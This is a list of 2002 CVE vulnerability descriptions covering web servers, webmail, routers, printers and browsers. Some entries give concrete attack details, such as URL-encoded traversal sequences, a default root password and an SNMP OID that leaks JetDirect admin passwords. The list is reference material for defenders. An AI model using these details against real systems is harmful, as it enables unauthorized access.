[CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
[CVE-2002-1547] Netscreen running ScreenOS 4.0.0r6 and earlier allows remote attackers to cause a denial of service via a malformed SSH packet to the Secure Command Shell (SCS) management interface, as demonstrated via certain CRC32 exploits, a different vulnerability than CVE-2001-0144.
[CVE-2002-1546] BRS WebWeaver Web Server 1.01 allows remote attackers to bypass password protections for files and directories via an HTTP request containing a "/./" sequence.
[CVE-2002-1535] Secure Webserver 1.1 in Raptor 6.5 and Symantec Enterprise Firewall 6.5.2 allows remote attackers to identify IP addresses of hosts on the internal network via a CONNECT request, which generates different error messages if the host is present.
[CVE-2002-1527] emumail.cgi in EMU Webmail 5.0 allows remote attackers to determine the full pathname for emumail.cgi via a malformed string containing script, which generates a regular expression matching error that includes the pathname in the resulting error message.
[CVE-2002-1526] Cross-site scripting (XSS) vulnerability in emumail.cgi for EMU Webmail 5.0 allows remote attackers to inject arbitrary HTML or script via the email address field.
[CVE-2002-1521] Web Server 4D (WS4D) 3.6 stores passwords in plaintext in the Ws4d.4DD file, which allows attackers to gain privileges.
[CVE-2002-1520] The CLI interface for WatchGuard Firebox Vclass 3.2 and earlier, and RSSA Appliance 3.0.2, does not properly close the SSH connection when a -N option is provided during authentication, which allows remote attackers to access CLI with administrator privileges.
[CVE-2002-1519] Format string vulnerability in the CLI interface for WatchGuard Firebox Vclass 3.2 and earlier, and RSSA Appliance 3.0.2, allows remote attackers to cause a denial of service and possibly execute arbitrary code via format string specifiers in the password parameter.
[CVE-2002-1504] Directory traversal vulnerability in WebServer 4 Everyone 1.22 allows remote attackers to read arbitrary files via "..\" (dot-dot backslash) sequences in a URL.
[CVE-2002-1489] Buffer overflow in PlanetDNS PlanetWeb 1.14 and earlier allows remote attackers to execute arbitrary code via (1) an HTTP GET request with a long URL or (2) a request with a long method name.
[CVE-2002-1484] DB4Web server, when configured to use verbose debug messages, allows remote attackers to use DB4Web as a proxy and attempt TCP connections to other systems (port scan) via a request for a URL that specifies the target IP address and port, which produces a connection status in the resulting error message.
[CVE-2002-1483] db4web_c and db4web_c.exe programs in DB4Web 3.4 and 3.6 allow remote attackers to read arbitrary files via an HTTP request whose argument is a filename of the form (1) C: (drive letter), (2) //absolute/path (double-slash), or (3) .. (dot-dot).
[CVE-2002-1467] Macromedia Flash Plugin before 6,0,47,0 allows remote attackers to bypass the same-domain restriction and read arbitrary files via (1) an HTTP redirect, (2) a "file://" base in a web document, or (3) a relative URL from a web archive (mht file).
[CVE-2002-1466] CafeLog b2 Weblog Tool 2.06pre4, with allow_fopen_url enabled, allows remote attackers to execute arbitrary PHP code via the b2inc variable.
[CVE-2002-1465] SQL injection vulnerability in CafeLog b2 Weblog Tool allows remote attackers to execute arbitrary SQL code via the tablehosts variable.
[CVE-2002-1464] Cross-site scripting (XSS) vulnerability in CafeLog b2 Weblog Tool allows remote attackers to insert arbitrary HTML or script via the GPC variable.
[CVE-2002-1461] Web Shop Manager 1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search box.
[CVE-2002-1455] Multiple cross-site scripting (XSS) vulnerabilities in OmniHTTPd allow remote attackers to insert script or HTML into web pages via (1) test.php, (2) test.shtml, or (3) redir.exe.
[CVE-2002-1454] MyWebServer 1.0.2 allows remote attackers to determine the absolute path of the web document root via a request for a directory that does not exist, which leaks the pathname in an error message.
[CVE-2002-1453] Cross-site scripting (XSS) vulnerability in MyWebServer 1.0.2 allows remote attackers to insert script and HTML via a long request followed by the malicious script, which is echoed back to the user in an error message.
[CVE-2002-1452] Buffer overflow in the search capability for MyWebServer 1.0.2 allows remote attackers to execute arbitrary code via a long searchTarget parameter.
[CVE-2002-1451] Blazix before 1.2.2 allows remote attackers to read source code of JSP scripts or list restricted web directories via an HTTP request that ends in a (1) "+" or (2) "\" (backslash) character.
[CVE-2002-1449] eUpload 1.0 stores the password.txt password file in plaintext under the web document root, which allows remote attackers to overwrite arbitrary files by reading password.txt.
[CVE-2002-1443] The Google toolbar 1.1.58 and earlier allows remote web sites to monitor a user's input into the toolbar via an "onkeydown" event handler.
[CVE-2002-1442] The Google toolbar 1.1.58 and earlier allows remote web sites to perform unauthorized toolbar operations including script execution and file reading in other zones such as "My Computer" by opening a window to tools.google.com or the res: protocol, then using script to modify the window's location to the toolbar's configuration URL, which bypasses the origin verification check.
[CVE-2002-1440] The Gateway GS-400 server has a default root password of "0001n" that can not be changed via the administrative interface, which can allow attackers to gain root privileges.
[CVE-2002-1438] The web handler for Perl 5.003 on Novell NetWare 5.1 and NetWare 6 allows remote attackers to obtain Perl version information via the -v option.
[CVE-2002-1437] Directory traversal vulnerability in the web handler for Perl 5.003 on Novell NetWare 5.1 and NetWare 6 allows remote attackers to read arbitrary files via an HTTP request containing "..%5c" (URL-encoded dot-dot backslash) sequences.
[CVE-2002-1436] The web handler for Perl 5.003 on Novell NetWare 5.1 and NetWare 6 allows remote attackers to execute arbitrary Perl code via an HTTP POST request.
[CVE-2002-1434] Multiple cross-site scripting (XSS) vulnerabilities in the Web mail module of Kerio MailServer 5.0 allow remote attackers to execute HTML script as other users via certain URLs.
[CVE-2002-1432] MidiCart stores the midicart.mdb database file under the Web document root, which allows remote attackers to steal sensitive information by directly requesting the database.
[CVE-2002-1416] The POP3 service for WebEasyMail 3.4.2.2 and earlier generates different error messages for valid and invalid usernames during authentication, which makes it easier for remote attackers to conduct brute force attacks.
[CVE-2002-1415] Format string vulnerability in SMTP service for WebEasyMail 3.4.2.2 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via format strings in SMTP requests.
[CVE-2002-1390] The daemon for GeneWeb before 4.09 does not properly handle requested paths, which allows remote attackers to read arbitrary files via a crafted URL.
[CVE-2002-1388] Cross-site scripting (XSS) vulnerability in MHonArc before 2.5.14 allows remote attackers to inject arbitrary HTML into web archive pages via HTML mail messages.
[CVE-2002-1385] openwebmail_init in Open WebMail 1.81 and earlier allows local users to execute arbitrary code via .. (dot dot) sequences in a login name, such as the name provided in the sessionid parameter for openwebmail-abook.pl, which is used to find a configuration file that specifies additional code to be executed.
[CVE-2002-1383] Multiple integer overflows in Common Unix Printing System (CUPS) 1.1.14 through 1.1.17 allow remote attackers to execute arbitrary code via (1) the CUPSd HTTP interface, as demonstrated by vanilla-coke, and (2) the image handling code in CUPS filters, as demonstrated by mksun.
[CVE-2002-1380] Linux kernel 2.2.x allows local users to cause a denial of service (crash) by using the mmap() function with a PROT_READ parameter to access non-readable memory pages through the /proc/pid/mem interface.
[CVE-2002-1353] LocalWEB2000 HTTP server 2.1.0 stores passwords in plain text under the web document root in users.lst, which allows remote attackers to obtain the passwords via a direct request to users.lst.
[CVE-2002-1340] The "ConnectionFile" property in the DataSourceControl component in Office Web Components (OWC) 10 allows remote attackers to determine the existence of local files by detecting an exception.
[CVE-2002-1339] The "XMLURL" property in the Spreadsheet component of Office Web Components (OWC) 10 follows redirections, which allows remote attackers to determine the existence of local files based on exceptions, or to read WorkSheet XML files.
[CVE-2002-1338] The Load method in the Chart component of Office Web Components (OWC) 9 and 10 generates an exception when a specified file does not exist, which allows remote attackers to determine the existence of local files.
[CVE-2002-1335] Cross-site scripting (XSS) vulnerability in w3m 0.3.2 does not escape an HTML tag in a frame, which allows remote attackers to insert arbitrary web script or HTML and access files or cookies.
[CVE-2002-1334] Cross-site scripting (XSS) vulnerability in BizDesign ImageFolio 3.01 and earlier allows remote attackers to execute arbitrary web script as other users via (1) the direct parameter in imageFolio.cgi, or (2) nph-build.cgi.
[CVE-2002-1316] importInfo in the Admin Server for iPlanet WebServer 4.x, up to SP11, allows the web administrator to execute arbitrary commands via shell metacharacters in the dir parameter, and possibly allows remote attackers to exploit this vulnerability via a separate XSS issue (CVE-2002-1315).
[CVE-2002-1315] Cross-site scripting (XSS) vulnerability in the Admin Server for iPlanet WebServer 4.x, up to SP11, allows remote attackers to execute web script or HTML as the iPlanet administrator by injecting the desired script into error logs, and possibly escalating privileges by using the XSS vulnerability in conjunction with another issue (CVE-2002-1316).
[CVE-2002-1311] Courier sqwebmail before 0.40.0 does not quickly drop privileges after startup in certain cases, which could allow local users to read arbitrary files.
[CVE-2002-1267] Mac OS X 10.2.2 allows remote attackers to cause a denial of service by accessing the CUPS Printing Web Administration utility, aka "CUPS Printing Web Administration is Remotely Accessible."
[CVE-2002-1264] Buffer overflow in Oracle iSQL*Plus web application of the Oracle 9 database server allows remote attackers to execute arbitrary code via a long USERID parameter in the isqlplus URL.
[CVE-2002-1257] Microsoft Virtual Machine (VM) up to and including build 5.0.3805 allows remote attackers to execute arbitrary code by including a Java applet that invokes COM (Component Object Model) objects in a web site or an HTML mail.
[CVE-2002-1255] Microsoft Outlook 2002 allows remote attackers to cause a denial of service (repeated failure) via an email message with a certain invalid header field that is accessed using POP3, IMAP, or WebDAV, aka "E-mail Header Processing Flaw Could Cause Outlook 2002 to Fail."
[CVE-2002-1248] Northern Solutions Xeneo Web Server 2.1.0.0, 2.0.759.6, and other versions before 2.1.5 allows remote attackers to cause a denial of service (crash) via a GET request for a "%" URI.
[CVE-2002-1238] Peter Sandvik's Simple Web Server 0.5.1 and earlier allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/.
[CVE-2002-1236] The remote management web server for Linksys BEFSR41 EtherFast Cable/DSL Router before firmware 1.42.7 allows remote attackers to cause a denial of service (crash) via an HTTP request to Gozila.cgi without any arguments.
[CVE-2002-1217] Cross-Frame scripting vulnerability in the WebBrowser control as used in Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code, read arbitrary files, or conduct other unauthorized activities via script that accesses the Document property, which bypasses <frame> and <iframe> domain restrictions.
[CVE-2002-1213] Directory traversal vulnerability in RadioBird Software WebServer 4 Everyone 1.23 and 1.27, and other versions before 1.30, allows remote attackers to read arbitrary files via an HTTP request with ".." (dot-dot) sequences containing URL-encoded forward slash ("%2F") characters.
[CVE-2002-1212] Buffer overflow in RadioBird Software WebServer 4 Everyone 1.23 and 1.27, and other versions before 1.30, allows remote attackers to cause a denial of service (crash) via a long HTTP GET request.
[CVE-2002-1187] Cross-site scripting vulnerability (XSS) in Internet Explorer 5.01 through 6.0 allows remote attackers to read and execute files on the local system via web pages using the <frame> or <iframe> element and javascript, aka "Frames Cross Site Scripting," as demonstrated using the PrivacyPolicy.dlg resource.
[CVE-2002-1182] IIS 5.0 and 5.1 allows remote attackers to cause a denial of service (crash) via malformed WebDAV requests that cause a large amount of memory to be assigned.
[CVE-2002-1181] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web pages for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allow remote attackers to execute HTML script as other users through (1) a certain ASP file in the IISHELP virtual directory, or (2) possibly other unknown attack vectors.
[CVE-2002-1169] IBM Web Traffic Express Caching Proxy Server 3.6 and 4.x before 4.0.1.26 allows remote attackers to cause a denial of service (crash) via an HTTP request to helpout.exe with a missing HTTP version number, which causes ibmproxy.exe to crash.
[CVE-2002-1168] Cross-site scripting (XSS) vulnerability in IBM Web Traffic Express Caching Proxy Server 3.6 and 4.x before 4.0.1.26 allows remote attackers to execute script as other users via an HTTP request that contains a Location: header with a "%0a%0d" (CRLF) sequence, which echoes the Location as an HTTP header in the server response.
[CVE-2002-1167] Cross-site scripting (XSS) vulnerability in IBM Web Traffic Express Caching Proxy Server 3.6 and 4.x before 4.0.1.26 allows remote attackers to execute script as other users via an HTTP GET request.
[CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
[CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
[CVE-2002-1154] anlgform.pl in Analog before 5.23 does not restrict access to the PROGRESSFREQ progress update command, which allows remote attackers to cause a denial of service (disk consumption) by using the command to report updates more frequently and fill the web server error log.
[CVE-2002-1153] IBM Websphere 4.0.3 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via an HTTP request with long HTTP headers, such as "Host".
[CVE-2002-1149] The installation procedure for Invision Board suggests that users install the phpinfo.php program under the web root, which leaks sensitive information such as absolute pathnames, OS information, and PHP settings.
[CVE-2002-1147] The HTTP administration interface for HP Procurve 4000M Switch firmware before C.09.16, with stacking features and remote administration enabled, does not authenticate requests to reset the device, which allows remote attackers to cause a denial of service via a direct request to the device_reset CGI program.
[CVE-2002-1145] The xp_runwebtask stored procedure in the Web Tasks component of Microsoft SQL Server 7.0 and 2000, Microsoft Data Engine (MSDE) 1.0, and Microsoft Desktop Engine (MSDE) 2000 can be executed by PUBLIC, which allows an attacker to gain privileges by updating a webtask that is owned by the database owner through the msdb.dbo.mswebtasks table, which does not have strong permissions.
[CVE-2002-1135] modsecurity.php 1.10 and earlier, in phpWebSite 0.8.2 and earlier, allows remote attackers to execute arbitrary PHP source code via an inc_prefix parameter that points to the malicious code.
[CVE-2002-1134] Unknown vulnerability in Compaq WEBES Service Tools 2.0 through WEBES 4.0 (Service Pack 5) allows local users to read privileged files.
[CVE-2002-1133] Encoded directory traversal vulnerability in Dino's web server 2.1 allows remote attackers to read arbitrary files via ".." (dot dot) sequences with URL-encoded (1) "/" (%2f) or (2) "\" (%5c) characters.
[CVE-2002-1131] Cross-site scripting vulnerabilities in SquirrelMail 1.2.7 and earlier allow remote attackers to execute script as other web users via (1) addressbook.php, (2) options.php, (3) search.php, or (4) help.php.
[CVE-2002-1126] Mozilla 1.1 and earlier, and Mozilla-based browsers such as Netscape and Galeon, set the document referrer too quickly in certain situations when a new page is being loaded, which allows web pages to determine the next page that is being visited, including manually entered URLs, using the onunload handler.
[CVE-2002-1122] Buffer overflow in the parsing mechanism for ISS Internet Scanner 6.2.1, when using the license banner HTTP check, allows remote attackers to execute arbitrary code via a long web server response.
[CVE-2002-1120] Buffer overflow in Savant Web Server 3.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
[CVE-2002-1100] Cisco VPN 3000 Concentrator 2.2.x, and 3.x before 3.5.3, allows remote attackers to cause a denial of service (crash) via a long (1) username or (2) password to the HTML login interface.
[CVE-2002-1093] HTML interface for Cisco VPN 3000 Concentrator 2.x.x and 3.x.x before 3.0.3(B) allows remote attackers to cause a denial of service (CPU consumption) via a long URL request.
[CVE-2002-1081] The Administration console for Abyss Web Server 1.0.3 allows remote attackers to read files without providing login credentials via an HTTP request to a target file that ends in a "+" character.
[CVE-2002-1080] The Administration console for Abyss Web Server 1.0.3 before Patch 2 allows remote attackers to gain privileges and modify server configuration via direct requests to CHL files such as (1) srvstatus.chl, (2) consport.chl, (3) general.chl, (4) srvparam.chl, and (5) advanced.chl.
[CVE-2002-1079] Directory traversal vulnerability in Abyss Web Server 1.0.3 allows remote attackers to read arbitrary files via ..\ (dot-dot backslash) sequences in an HTTP GET request.
[CVE-2002-1078] Abyss Web Server 1.0.3 allows remote attackers to list directory contents via an HTTP GET request that ends in a large number of / (slash) characters.
[CVE-2002-1077] IPSwitch IMail Web Calendaring service (iwebcal) allows remote attackers to cause a denial of service (crash) via an HTTP POST request without a Content-Length field.
[CVE-2002-1076] Buffer overflow in the Web Messaging daemon for Ipswitch IMail before 7.12 allows remote attackers to execute arbitrary code via a long HTTP GET request for HTTP/1.0.
[CVE-2002-1069] The remote administration capability for the D-Link DI-804 router 4.68 allows remote attackers to bypass authentication and release DHCP addresses or obtain sensitive information via a direct web request to the pages (1) release.htm, (2) Device Status, or (3) Device Information.
[CVE-2002-1068] The web server for D-Link DP-300 print server allows remote attackers to cause a denial of service (hang) via a large HTTP POST request.
[CVE-2002-1060] Cross-site scripting (XSS) vulnerability in Blue Coat Systems (formerly CacheFlow) CacheOS on Client Accelerator 4.1.06, Security Gateway 2.1.02, and Server Accelerator 4.1.06 allows remote attackers to inject arbitrary web script or HTML via a URL to a nonexistent hostname that includes the HTML, which is inserted into the resulting error page.
[CVE-2002-1055] Buffer overflow in administrative web server for Brother NC-3100h printer allows remote attackers to cause a denial of service via a long password.
[CVE-2002-1048] HP JetDirect printers allow remote attackers to obtain the administrative password for the (1) web and (2) telnet services via an SNMP request to the variable .iso.3.6.1.4.1.11.2.3.9.4.2.1.3.9.1.1.0.
[CVE-2002-1042] Directory traversal vulnerability in search engine for iPlanet web server 6.0 SP2 and 4.1 SP9, and Netscape Enterprise Server 3.6, when running on Windows platforms, allows remote attackers to read arbitrary files via ..\ (dot-dot backslash) sequences in the NS-query-pat parameter.
[CVE-2002-1040] Unknown vulnerability in the WebSecure (DFSWeb) configuration utilities in AIX 4.x, possibly related to relative pathnames.
[CVE-2002-1037] Cross-site scripting vulnerability in Double Choco Latte (DCL) before 20020706 allows remote attackers to inject arbitrary HTML, including script, into web pages via the (1) Ticket# Find, (2) Priorities, (3) Severities, (4) Projects, (5) WO# Find, (6) Departments and (7) Users features.
[CVE-2002-1036] Cross-site scripting vulnerability in search.pl for Fluid Dynamics Search Engine (FDSE) before 2.0.0.0055 allows remote attackers to execute web script via the (1) Rank or (2) Match parameters.
[CVE-2002-1032] Buffer overflow in KeyFocus (KF) web server 1.0.5 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a malformed HTTP header.
[CVE-2002-1031] KeyFocus (KF) web server 1.0.2 allows remote attackers to list directories and read restricted files via an HTTP request containing a %00 (null) character.
[CVE-2002-1030] Race condition in Performance Pack in BEA WebLogic Server and Express 5.1.x, 6.0.x, 6.1.x and 7.0 allows remote attackers to cause a denial of service (crash) via a flood of data and connections.
[CVE-2002-1027] Cross-site scripting vulnerability in the default HTTP 500 error script (500error.jsp) for Macromedia Sitespring 1.2.0 (277.1) allows remote attackers to execute arbitrary web script via a link to 500error.jsp with the script in the et parameter.
[CVE-2002-1015] RealJukebox 2 1.0.2.340 and 1.0.2.379, and RealOne Player Gold 6.0.10.505, allows remote attackers to execute arbitrary script in the Local computer zone by inserting the script into the skin.ini file of an RJS archive, then referencing skin.ini from a web page after it has been extracted, which is parsed as HTML by Internet Explorer or other Microsoft-based web readers.
[CVE-2002-1012] Buffer overflow in web server for Tivoli Management Framework (TMF) ManagedNode 3.6.x through 3.7.1 allows remote attackers to cause a denial of service or execute arbitrary code via a long HTTP GET request.
[CVE-2002-1011] Buffer overflow in web server for Tivoli Management Framework (TMF) Endpoint 3.6.x through 3.7.1, before Fixpack 2, allows remote attackers to cause a denial of service or execute arbitrary code via a long HTTP GET request.
[CVE-2002-1010] Lotus Domino R4 allows remote attackers to bypass access restrictions for files in the web root via an HTTP request appended with a "?" character, which is treated as a wildcard character and bypasses the web handlers.
[CVE-2002-1009] Cross-site scripting vulnerability in PowerBASIC pbcgi.cgi, as included in Lil' HTTP web server, allows remote attackers to execute arbitrary web script in other web browsers via the (1) "Name" or (2) "E-mail" parameters.
[CVE-2002-1008] Cross-site scripting vulnerability in PowerBASIC urlcount.cgi, as included in Lil' HTTP web server, allows remote attackers to execute arbitrary web script in other web browsers via a request to urlcount.cgi that contains the script, which is not filtered when the REPORT capability prints the original request.
[CVE-2002-1007] Cross-site scripting vulnerabilities in Blackboard 5 allow remote attackers to execute arbitrary web script via (1) the course_id parameter in a link to login.pl, (2) the CTID parameter in ProcessInfo.cgi, or (3) the Message parameter in index.cgi.
[CVE-2002-1006] Cross-site scripting (XSS) vulnerability in BBC Education Text to Speech Internet Enhancer (Betsie) 1.5.11 and earlier allows remote attackers to execute arbitrary web script via parserl.pl.
[CVE-2002-1005] ArGoSoft Mail Server 1.8.1.7 and earlier allows a webmail user to cause a denial of service (CPU consumption) by forwarding the email to the user while autoresponse is enabled, which creates an infinite loop.
[CVE-2002-1004] Directory traversal vulnerability in webmail feature of ArGoSoft Mail Server Plus or Pro 1.8.1.5 and earlier allows remote attackers to read arbitrary files via .. (dot dot) sequences in a URL.
[CVE-2002-1003] Buffer overflow in MyWebServer 1.02 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
[CVE-2002-0996] Multiple buffer overflows in Novell NetMail (NIMS) 3.0.3 before 3.0.3C allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) WebAdmin or (2) ModWeb.
[CVE-2002-0990] The web proxy component in Symantec Enterprise Firewall (SEF) 6.5.2 through 7.0, Raptor Firewall 6.5 and 6.5.3, VelociRaptor, and Symantec Gateway Security allows remote attackers to cause a denial of service (connection resource exhaustion) via multiple connection requests to domains whose DNS server is unresponsive or does not exist, which generates a long timeout.
[CVE-2002-0980] The Web Folder component for Internet Explorer 5.5 and 6.0 writes an error message to a known location in the temporary folder, which allows remote attackers to execute arbitrary code by injecting it into the error message, then referring to the error message file via a mhtml: URL.
[CVE-2002-0976] Internet Explorer 4.0 and later allows remote attackers to read arbitrary files via a web page that accesses a legacy XML Datasource applet (com.ms.xml.dso.XMLDSO.class) and modifies the base URL to point to the local system, which is trusted by the applet.
[CVE-2002-0975] Buffer overflow in Microsoft DirectX Files Viewer ActiveX control (xweb.ocx) 2.0.6.15 and earlier allows remote attackers to execute arbitrary code via a long File parameter.
[CVE-2002-0966] Buffer overflow in 4D web server 6.7.3 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP request.
[CVE-2002-0955] Cross-site scripting vulnerability in YaBB.cgi for Yet Another Bulletin Board (YaBB) 1 Gold SP1 and earlier allows remote attackers to execute arbitrary script as other web site visitors via script in the num parameter, which is not filtered in the resulting error message.
[CVE-2002-0952] Cisco ONS15454 optical transport platform running ONS 3.1.0 to 3.2.0 allows remote attackers to cause a denial of service (reset) by sending IP packets with non-zero Type of Service (TOS) bits to the Timing Control Card (TCC) LAN interface.
[CVE-2002-0948] Scripts For Educators MakeBook 2.2 CGI program allows remote attackers to execute script as other visitors, or execute server-side includes (SSI) as the web server, via the (1) Name or (2) Email parameters, which are not properly filtered.
[CVE-2002-0943] MetaCart2.sql stores the user database under the web document root without access controls, which allows remote attackers to obtain sensitive information such as passwords and credit card numbers via a direct request for metacart.mdb.
[CVE-2002-0938] Cross-site scripting vulnerability in CiscoSecure ACS 3.0 allows remote attackers to execute arbitrary script or HTML as other web users via the action argument in a link to setup.exe.
[CVE-2002-0937] The Java Server Pages (JSP) engine in JRun allows web page owners to cause a denial of service (engine crash) on the web server via a JSP page that calls WPrinterJob().pageSetup(null,null).
[CVE-2002-0936] The Java Server Pages (JSP) engine in Tomcat allows web page owners to cause a denial of service (engine crash) on the web server via a JSP page that calls WPrinterJob().pageSetup(null,null).
[CVE-2002-0926] Directory traversal vulnerability in Wolfram Research webMathematica 1.0.0 and 1.0.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the MSPStoreID parameter.
[CVE-2002-0917] CGIScript.net csPassword.cgi stores .htpasswd files under the web document root, which could allow remote authenticated users to download the file and crack the passwords of other users.
[CVE-2002-0908] Directory traversal vulnerability in the web server for Cisco IDS Device Manager before 3.1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the HTTPS request.
[CVE-2002-0900] Buffer overflow in pks PGP public key web server before 0.9.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long search argument to the lookup capability.
[CVE-2002-0899] Falcon web server 2.0.0.1021 and earlier allows remote attackers to bypass access restrictions for protected files via a URL whose directory portion ends in a . (dot).
[CVE-2002-0898] Opera 6.0.1 and 6.0.2 allows a remote web site to upload arbitrary files from the client system, without prompting the client, via an input type=file tag whose value contains a newline.
[CVE-2002-0897] LocalWEB2000 2.1.0 web server allows remote attackers to bypass access restrictions for restricted files via a URL that contains the "/./" directory.
[CVE-2002-0892] The default configuration of NewAtlanta ServletExec ISAPI 4.1 allows remote attackers to determine the path of the web root via a direct request to com.newatlanta.servletexec.JSP10Servlet without a filename, which leaks the pathname in an error message.
[CVE-2002-0882] The web server for Cisco IP Phone (VoIP) models 7910, 7940, and 7960 allows remote attackers to cause a denial of service (reset) and possibly read sensitive memory via a large integer value in (1) the stream ID of the StreamingStatistics script, or (2) the port ID of the PortInformation script.
[CVE-2002-0876] Web server for Shambala 4.5 allows remote attackers to cause a denial of service (crash) via a malformed HTTP request.
[CVE-2002-0861] Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to bypass the "Allow paste operations via script" setting, even when it is disabled, via the (1) Copy method of the Cell object or (2) the Paste method of the Range object.
[CVE-2002-0860] The LoadText method in the spreadsheet component in Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to read arbitrary files through Internet Explorer via a URL that redirects to the target file.
[CVE-2002-0845] Buffer overflow in Sun ONE / iPlanet Web Server 4.1 and 6.0 allows remote attackers to execute arbitrary code via an HTTP request using chunked transfer encoding.
[CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
[CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
[CVE-2002-0837] wordtrans 1.1pre8 and earlier in the wordtrans-web package allows remote attackers to (1) execute arbitrary code or (2) conduct cross-site scripting attacks via certain parameters (possibly "dict") to the wordtrans.php script.
[CVE-2002-0818] wwwoffled in World Wide Web Offline Explorer (WWWOFFLE) allows remote attackers to cause a denial of service and possibly execute arbitrary code via a negative Content-Length value.
[CVE-2002-0815] The Javascript "Same Origin Policy" (SOP), as implemented in (1) Netscape, (2) Mozilla, and (3) Internet Explorer, allows a remote web server to access HTTP and SOAP/XML content from restricted sites by mapping the malicious server's parent DNS domain name to the restricted site, loading a page from the restricted site into one frame, and passing the information to the attacker-controlled frame, which is allowed because the document.domain of the two frames matches on the parent domain.
[CVE-2002-0787] Cross-site scripting vulnerabilities in iCon administrative web server for Critical Path inJoin Directory Server 4.0 allow remote attackers to execute script as the administrator via administrator URLs with modified (1) LOCID or (2) OC parameters.
[CVE-2002-0786] iCon administrative web server for Critical Path inJoin Directory Server 4.0 allows authenticated inJoin administrators to read arbitrary files by specifying the target file in the LOG parameter.
[CVE-2002-0784] Directory traversal vulnerability in Lysias Lidik web server 0.7b allows remote attackers to list directories via an HTTP request with a ... (modified dot dot).
[CVE-2002-0782] Novell BorderManager 3.5 with PAT (Port-Address Translate) enabled allows remote attackers to cause a denial of service by filling the connection table with a large number of connection requests to hosts that do not have a specific route, which may be forwarded to the public interface.
[CVE-2002-0774] Hosting Controller creates a default user AdvWebadmin with a default password, which could allow remote attackers to gain privileges if the password is not changed.
[CVE-2002-0763] Vulnerability in administration server for HP VirtualVault 4.5 on HP-UX 11.04 allows remote web servers or privileged external processes to bypass access restrictions and establish connections to the server.
[CVE-2002-0757] (1) Webmin 0.96 and (2) Usermin 0.90 with password timeouts enabled allow local and possibly remote attackers to bypass authentication and gain privileges via certain control characters in the authentication information, which can force Webmin or Usermin to accept arbitrary username/session ID combinations.
[CVE-2002-0756] Cross-site scripting vulnerability in the authentication page for (1) Webmin 0.96 and (2) Usermin 0.90 allows remote attackers to insert script into an error page and possibly steal cookies.
[CVE-2002-0753] Buffer overflow in Talentsoft Web+ 5.0 allows remote attackers to execute arbitrary code via an HTTP request with a long cookie.
[CVE-2002-0752] CGIscript.net csMailto.cgi program exports feedback to a file that is accessible from the web document root, which could allow remote attackers to obtain sensitive information by directly accessing the file.
[CVE-2002-0748] LabVIEW Web Server 5.1.1 through 6.1 allows remote attackers to cause a denial of service (crash) via an HTTP GET request that ends in two newline characters, instead of the expected carriage return/newline combinations.
[CVE-2002-0738] MHonArc 2.5.2 and earlier does not properly filter Javascript from archived e-mail messages, which could allow remote attackers to execute script in web clients by (1) splitting the SCRIPT tag into smaller pieces, (2) including the script in a SRC argument to an IMG tag, or (3) using "&={script}" syntax.
[CVE-2002-0737] Sambar web server before 5.2 beta 1 allows remote attackers to obtain source code of server-side scripts, or cause a denial of service (resource exhaustion) via DOS devices, using a URL that ends with a space and a null character.
[CVE-2002-0727] The Host function in Microsoft Office Web Components (OWC) 2000 and 2002 is exposed in components that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via the setTimeout method.
[CVE-2002-0718] Web authoring command in Microsoft Content Management Server (MCMS) 2001 allows attackers to authenticate and upload executable content, by modifying the upload location, aka "Program Execution via MCMS Authoring Function."
[CVE-2002-0715] Vulnerability in Squid before 2.4.STABLE6 related to proxy authentication credentials may allow remote web sites to obtain the user's proxy login and password.
[CVE-2002-0709] SQL injection vulnerabilities in the Web Reports Server for SurfControl SuperScout WebFilter allow remote attackers to execute arbitrary SQL queries via the RunReport option to SimpleBar.dll, and possibly other DLLs.
[CVE-2002-0708] Directory traversal vulnerability in the Web Reports Server for SurfControl SuperScout WebFilter allows remote attackers to read arbitrary files via an HTTP request containing ... (triple dot) sequences.
[CVE-2002-0707] The Web Reports Server for SurfControl SuperScout WebFilter allows remote attackers to cause a denial of service (CPU consumption) via large GET requests, possibly due to a buffer overflow.
[CVE-2002-0706] UserManager.js in the Web Reports Server for SurfControl SuperScout WebFilter uses weak encryption for administrator functions, which allows remote attackers to decrypt the administrative password using a hard-coded key in a Javascript function.
[CVE-2002-0705] The Web Reports Server for SurfControl SuperScout WebFilter stores the "scwebusers" username and password file in a web-accessible directory, which allows remote attackers to obtain valid usernames and crack the passwords.
